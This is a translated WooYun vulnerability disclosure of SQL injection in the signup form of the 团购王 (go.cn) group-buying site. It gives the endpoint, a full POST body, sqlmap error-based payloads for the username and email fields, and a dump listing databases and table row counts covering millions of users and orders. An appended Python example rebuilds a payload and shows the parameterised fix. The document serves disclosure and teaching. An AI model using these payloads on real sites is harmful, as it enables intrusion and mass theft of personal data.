
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0118379

Title: SQL injection on the 团购王 main site exposes 8 million user records and 4 million order records

Vendor: 团购王

Author: 路人甲

Submitted: 2015-06-05 10:53

Fix time: 2015-06-10 10:54

Disclosure time: 2015-06-10 10:54

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-05: details sent to the vendor, awaiting vendor handling
2015-06-10: the vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

233

Detailed description:

The registration endpoint. Both the username and email fields of the signup POST below are injectable (see the sqlmap output under the proof section):
http://www.go.cn:80/index.php?m=signup (POST)
commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=beijing&do=insert&email=ag&password=wyd&password2=wyD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=wooyun&yanzhengma=1

Proof of vulnerability:

Screenshots: g20150605101900.png, g20150605102023.png

sqlmap output (error-based injection confirmed on two parameters, then database and table enumeration):

---
Parameter: username (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb' AND (SELECT 6431 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(6431=6431,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RTTd'='RTTd&yanzhengma=1
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Parameter: email (POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: commit=%e5%90%8c%e6%84%8f%e5%b9%b6%e6%b3%a8%e5%86%8c&cityid_city=San Francisco&do=insert&email=ag' AND (SELECT 8651 FROM(SELECT COUNT(*),CONCAT(0x7171707171,(SELECT (ELT(8651=8651,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'krPi'='krPi&password=g00dPa$$w0rD&password2=g00dPa$$w0rD&province=%e5%8c%97%e4%ba%ac&subscribe=1&username=agvtjtdb&yanzhengma=1
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
back-end DBMS: MySQL 5.0
available databases [10]:
[*] baiduzy
[*] go
[*] go.cn
[*] gocnappapi
[*] gocnopen
[*] mysql
[*] nuomi
[*] percona
[*] performance_schema
[*] test
Database: go.cn
+-------------------------------------------+---------+
| Table | Entries |
+-------------------------------------------+---------+
| jiuder_source_address_history | 31943364 |
| jiuder_user | 8062578 |
| jiuder_adminlog | 6192775 |
| jiuder_KeywordSearchInfo | 5645317 |
| jiuder_smslog_20130817 | 4231301 |
| jiuder_order | 4174809 |
| jiuder_subway_station_group_relation | 2776647 |
| jiuder_maillog | 2422258 |
| jiuder_useraddress | 2366783 |
| jiuder_network | 2275597 |
| jiuder_usercoupons | 1639313 |
| jiuder_access_info | 1512328 |
| jiuder_creditlog | 1487229 |
| jiuder_brand_click | 1152692 |
| jiuder_supplier_tuikuan_flow_log | 1065049 |
| jiuder_group | 1043867 |
| jiuder_baidu_type_group | 1043861 |
| jiuder_group_relation_changecate2 | 1040469 |
| jiuder_group_relation_changecate | 1039236 |
| jiuder_supplier_lalotude | 1032639 |
| jiuder_group_information | 1024431 |
| jiuder_360_type_group | 1004924 |
| jiuder_operation_history | 940136 |
| jiuder_othersites_relation_group | 854442 |
| jiuder_area_business_group_relation | 850113 |
| jiuder_water_table_set | 740059 |
| jiuder_groupcoupons | 736374 |
| jiuder_orderlog | 730253 |
| jiuder_invalid_order | 695579 |
| jiuder_lottery | 675531 |
| jiuder_baidurecord | 475263 |
| jiuder_asyncode_order | 475153 |
| ip_address | 403719 |
| jiuder_smslog | 399792 |
| jiuder_source | 377672 |
| jiuder_user_subjoin | 346186 |
| jiuder_call_log | 340588 |
| jiuder_supplier_schedule | 331731 |
| jiuder_supplier_tuikuan_yunfei | 318747 |
| jiuder_group_property_value | 303649 |
| jiuder_error_log | 274149 |
| jiuder_order_return_log | 216548 |
| jiuder_supplier_tuikuan_flow_log_history | 209341 |
| jiuder_asyncode_order_history | 207810 |
| jiuder_supplier_tuikuan_flow_info | 206542 |
| jiuder_supplier_tuikuan | 198427 |
| jiuder_total_salenum_table | 195616 |
| jiuder_group_relation_type | 157447 |
| jiuder_click_demand | 127518 |
| jiuder_consult | 121296 |
| jiuder_group_property_relation | 120071 |
| jiuder_group_top_gid | 108376 |
| jiuder_order_return | 104903 |
| jiuder_api_visits | 104008 |
| jiuder_complaints | 103539 |
| jiuder_othersites_relation_user | 98315 |
| jiuder_group_oneday_statistics | 97446 |
| jiuder_totalorder | 89057 |
| jiuder_chargecard | 84374 |
| jiuder_KeywordSearchHistory | 84318 |
| jiuder_feedback | 82449 |
| jiuder_ctrip_usetime_change | 75469 |
| jiuder_supplier_tuikuan_flow_info_history | 74400 |
| jiuder_othersites_relation_order | 67580 |
| jiuder_group_property_name | 67258 |
| jiuder_waplog | 58926 |
| jiuder_luckgame_log | 54031 |
| jiuder_source_address | 52825 |
| jiuder_voucher_order_act | 51440 |
| jiuder_daily_statistic | 51089 |
| jiuder_projects | 41561 |
| jiuder_invite | 37080 |
| jiuder_modify_mobilebind | 33033 |
| jiuder_holiday | 28506 |
| jiuder_area_and_business | 25055 |
| jiuder_supplier | 22215 |
| jiuder_change_api_gid | 21420 |
| jiuder_group_api_line | 21329 |
| egg_record | 17002 |
| jiuder_maillist | 13297 |
| jiuder_supplier_tuikuan_account | 12600 |
| jiuder_masses_comments | 11658 |
| jiuder_set_jinshan_api | 11650 |
| tmp | 10000 |
.......................

Fix suggestion:

~~~~~~~~~~~~~ Please don't give up on treatment.

Copyright notice: reprints must credit the source, 路人甲@乌云
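The report gives no fix, and the sqlmap output does not explain why a "Duplicate entry" error leaks data, so the following is an added example written for this page, not code from the report or from 团购王. It does two things: it rebuilds the first sqlmap payload from the Vector template quoted above and parses a constructed MySQL "Duplicate entry" message the way sqlmap does, and it contrasts a hypothetical reconstruction of the vulnerable signup INSERT (form fields pasted into SQL) with the parameterised version that fixes it. The table name jiuder_user is taken from the dump; its columns, the handler signatures, the sample error text and the use of SQLite as a stand-in for MySQL are assumptions.

```python
import re
import sqlite3
from typing import Optional, Tuple

# Delimiters exactly as they appear in the sqlmap payloads in the report, as MySQL hex
# literals (sqlmap uses hex literals so the payload needs no additional quote characters).
DELIM_START_HEX = "0x7171707171"   # decodes to 'qqpqq'
DELIM_STOP_HEX = "0x71766b7071"    # decodes to 'qvkpq'


def hex_literal_to_str(lit: str) -> str:
    """Decode a MySQL 0x... literal into the string MySQL would concatenate."""
    return bytes.fromhex(lit[2:]).decode("ascii")


def build_error_based_payload(prefix: str, query: str, randnum: int = 6431) -> str:
    """Fill in sqlmap's Vector template quoted in the report.

    GROUP BY on a key that mixes [QUERY]'s result with FLOOR(RAND(0)*2) makes MySQL hit a
    duplicate group key and raise 'Duplicate entry'; that error message carries the result
    of [QUERY] between the two delimiters. The closing AND 'RTTd'='RTTd re-balances the
    quote opened by the application's own query.
    """
    return (
        f"{prefix}' AND (SELECT {randnum} FROM(SELECT COUNT(*),CONCAT({DELIM_START_HEX},"
        f"({query}),{DELIM_STOP_HEX},FLOOR(RAND(0)*2))x "
        f"FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'RTTd'='RTTd"
    )


def extract_from_error(error_text: str) -> Optional[str]:
    """Pull the exfiltrated value out of a MySQL 'Duplicate entry' message."""
    start = re.escape(hex_literal_to_str(DELIM_START_HEX))
    stop = re.escape(hex_literal_to_str(DELIM_STOP_HEX))
    m = re.search(start + r"(.*?)" + stop, error_text, re.S)
    return m.group(1) if m else None


# --- The fix: how the signup INSERT should and should not be built -------------------
# jiuder_user is the table named in the dump; the columns below are assumed.
SCHEMA = ("CREATE TABLE jiuder_user "
          "(id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT)")


def signup_vulnerable(conn: sqlite3.Connection, username: str, email: str, password: str) -> None:
    """Hypothetical reconstruction of the bug class: form fields pasted straight into SQL."""
    sql = ("INSERT INTO jiuder_user (username, email, password) "
           f"VALUES ('{username}', '{email}', '{password}')")
    conn.execute(sql)
    conn.commit()


def signup_fixed(conn: sqlite3.Connection, username: str, email: str, password: str) -> None:
    """Parameterised statement: values travel separately from the SQL text, so a quote in
    the username is data, never syntax. (MySQL drivers use %s instead of ? placeholders.)"""
    conn.execute(
        "INSERT INTO jiuder_user (username, email, password) VALUES (?, ?, ?)",
        (username, email, password),
    )
    conn.commit()


def run_signup(handler, username: str) -> Tuple[str, str]:
    """Run one handler against a fresh in-memory database and report what happened."""
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    try:
        handler(conn, username, "ag", "wyd")
    except sqlite3.Error as err:
        # The injected SQL reached the parser: the error is about the attacker's subquery
        # (unknown functions/tables), not about the application's own statement.
        return ("sql_error", str(err))
    row = conn.execute("SELECT username FROM jiuder_user").fetchone()
    return ("stored", row[0])


# The username value from the first sqlmap payload in the report, rebuilt from the template.
PAYLOAD = build_error_based_payload("agvtjtdb", "SELECT (ELT(6431=6431,1))")

# Constructed example of the error MySQL returns when [QUERY] is SELECT database();
# the text between the delimiters is what sqlmap reads back.
SAMPLE_ERROR = "Duplicate entry 'qqpqqgo.cnqvkpq1' for key 'group_key'"

if __name__ == "__main__":
    print("payload:", PAYLOAD)
    print("extracted from error:", extract_from_error(SAMPLE_ERROR))
    print("vulnerable handler:", run_signup(signup_vulnerable, PAYLOAD))
    print("fixed handler:", run_signup(signup_fixed, PAYLOAD))
```

Run stand-alone, the vulnerable handler fails inside the attacker's subquery (proof that the injected SQL was parsed and executed), while the fixed handler stores the whole payload as an ordinary username string. The same parameterisation must be applied to every field of the form, since the report shows that email was injectable as well as username; filtering the one parameter sqlmap happened to report first would not close the hole.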


Vulnerability response

Vendor response:

Severity: No impact (vendor ignored the vulnerability)

Ignored at: 2015-06-10 10:54

Vendor reply:

Vulnerability Rank: 15 (WooYun assessment)

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-06-05 11:11 | 牛 小 帅 (Regular white hat | Rank: 363 | Vulnerabilities: 84 | [code]If the heart has nowhere to rest, wherever you go you are...)

    I'm guessing this one is going to blow up.

  2. 2015-06-05 13:13 | DeadSea (Intern white hat | Rank: 86 | Vulnerabilities: 28 | Keep calm)

    @小龙 Look at what this guy did.

  3. 2015-06-05 19:48 | 小龙 (Regular white hat | Rank: 1208 | Vulnerabilities: 316 | WooYun has a group of people who learn techniques on WooYun and then go to some...)

    @DeadSea Look my ass, piss off and go to sleep.